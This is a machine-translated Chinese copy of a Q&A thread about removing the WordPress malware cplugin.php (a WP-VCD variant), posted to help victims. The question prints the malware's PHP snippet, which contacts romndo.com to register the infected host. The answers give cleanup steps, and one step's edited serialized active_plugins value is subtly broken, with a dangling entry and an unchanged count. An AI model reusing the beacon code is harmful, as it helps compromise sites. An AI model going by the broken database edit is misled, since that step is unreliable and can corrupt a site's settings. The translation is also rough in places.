最近有一次攻击,许多WordPress网站由于一个文件cplugin.php而被关闭,这是一个恶意软件。
该恶意软件是糟糕的编写代码,所以现在它主要是造成500服务器运行时错误。但最好立即删除它,因为它迁移到服务器上的所有多个网站,并有代码击中恶意软件的网址下载额外的文件。恶意软件代码片段:
if(get_option('log_install') !=='1')
{
if(!$log_installed = @file_get_contents("http://www.romndo.com/o2.php?host=".$_SERVER["HTTP_HOST"]))
{
$log_installed = @file_get_contents_cplugin("http://www.romndo.com/o2.php?host=".$_SERVER["HTTP_HOST"]);
}
}我已经想出了一个解决方案,并张贴自己的答案,以帮助所有用户在那里。
编辑:
有报告称,同一个文件对用户的命名不同:ccode.php, cplugin.php和helad.php,在这种情况下,可以修改修复。
6条答案
按热度按时间xoefb8l81#
这不是攻击,但恶意软件包含无效插件或主题您下载并安装自己.它是WP-VCD的更新版本- WordFence有一个白皮书,其中包含WP-VCD: The Malware You Installed On Your Own Site中的所有细节,也许我们应该称之为“WP-VCD扩展”:)
妥协的指标是名为
ccode.php,cplugin.php,helad.php和mplugin.php(和admin_ips.txt)的插件文件在wp-content/plugins和插件/主题文件夹中的class.plugin-modules.php或class.theme-modules.php。打扫
1.在
class.plugin-modules.php或class.theme-modules.php中找到带有恶意软件的插件或主题,并删除该插件或主题(如果您需要-从官方来源购买)。1.删除恶意软件插件:
ccode.php、cplugin.php、helad.php或mplugin.php。1.重复它的所有网站在同一托管帐户/服务器。
安装过程似乎确实触及
wp-includes/functions.php,但它只试图删除恶意软件,所以这可能是从以前的恶意软件版本升级的一部分。wz8daaqr2#
这看起来像是某种全球性的攻击在plugins文件夹中有一个文件cplugin.php,它导致了网站的宕机。删除该文件是没有用的,因为它重新出现。它也会感染多网站服务器上的所有其他网站。幸运的是,经过几个小时的工作,已经找到了解决办法。请仔细阅读此内容以修复您的网站:
1.备份您的数据库和文件
1.编辑你的wp_options表,找到属性
active_plugins并编辑它,你会看到它有一个cplugin.php的插件条目。我们得删除它。您的初始数据看起来像这样:a:16:{i:0;s:27:"carousel-anything/index.php";i:1;s:36:"contact-form-7/wp-contact-form-7.php";i:2;s:11:"cplugin.php";i:3;s:32:"duplicate-page/duplicatepage.php";i:4;s:31:"envato-market/envato-market.php"....编辑这个以删除cplugin.php条目,从
i开始到下一个;并删除它。(确保你的数据库备份,以防你犯了一些错误)。没有cplugin.php的新条目看起来像:a:16:{i:0;s:27:"carousel-anything/index.php";i:1;s:36:"contact-form-7/wp-contact-form-7.php";i:2;i:3;s:32:"duplicate-page/duplicatepage.php";i:4;s:31:"envato-market/envato-market.php"....1.对wp_option表中名为
site_transient_update_plugins的字段执行类似的步骤前:
O:8:"stdClass":5:{s:12:"last_checked";i:1598414385;s:7:"checked";a:16:{s:27:"carousel-anything/index.php";s:3:"2.0";s:36:"contact-form-7/wp-contact-form-7.php";s:3:"5.2";s:11:"cplugin.php";s:3:"1.0";s:32:"duplicate-page/duplicatepage.php";.....后:
O:8:"stdClass":5:{s:12:"last_checked";i:1598414385;s:7:"checked";a:16:{s:27:"carousel-anything/index.php";s:3:"2.0";s:36:"contact-form-7/wp-contact-form-7.php";s:3:"5.2";s:32:"duplicate-page/duplicatepage.php";.....1.更新字段后,导航回主插件文件夹
/wp-content/plugins并删除文件cplugin.php1.登录到您的WordPress Jmeter 板并重新激活所有插件
你已经修复了你的网站。
我认为技术原因是恶意软件将自己注册为wordpress插件,在删除时自动替换文件。幸运的是,恶意软件是写得很糟糕的代码,所以不是运行它主要抛出
500 error。但无论如何,我会建议立即删除它,以防它更新。编辑:根据这个topic上的wordpress论坛线程,对于一些用户来说,简单地重命名文件也可以使网站正常工作,这可能是因为在wordpress中重命名文件会停用插件,因为网站开始工作。但我不会让受感染的文件重命名和存储在任何情况下,所以会建议第一个解决方案后,至少获得访问该网站.
4ktjp1zp3#
另一种方法来解决这个问题在3个步骤:
1.删除恶意插件通过此请求创建的wp_option中的所有条目:
从
wp_options搜索WHERE option_name =“ip_admin”OR option_name=“ad_code”OR option_name=“cookies_admin”OR option_name =“logged_admin”OR option_name=“hide_admin”OR option_name =“hide_logged_in”OR option_name=“display_ad”OR option_name=“search_engines”OR option_name=“auto_update”OR option_name=“log_install”1.识别在 /wp-content/plugins 目录(Linux OS上的 ls -lrtha)中创建的野生插件文件,将其删除并创建一个指向 /dev/null 的符号链接,使用此名称,该文件从未正确创建过。命令行来执行此操作(在Linux上):
ln -s /dev/null mplugin.php
1.可选的,但只是为了避免错误日志中的任何噪音,从 wp_options 表中删除 * nameplugin.php *,其中option_name = _site_transient_update_plugins。
brjng4g34#
在我们网站的数据库中没有条目,但调用代码被添加到wp-includes文件夹中functions.php的底部。删除违规呼叫和网站弹出的权利。:)
bvuwiixz5#
在名为cplugin.php和helad.php的wp-content文件夹文件中,在这种情况下可以修改修复。立即删除它,因为它迁移到服务器上的所有多个网站,并有代码击中恶意软件URL下载其他文件。
13z8s7eq6#
您使用了主题或插件null。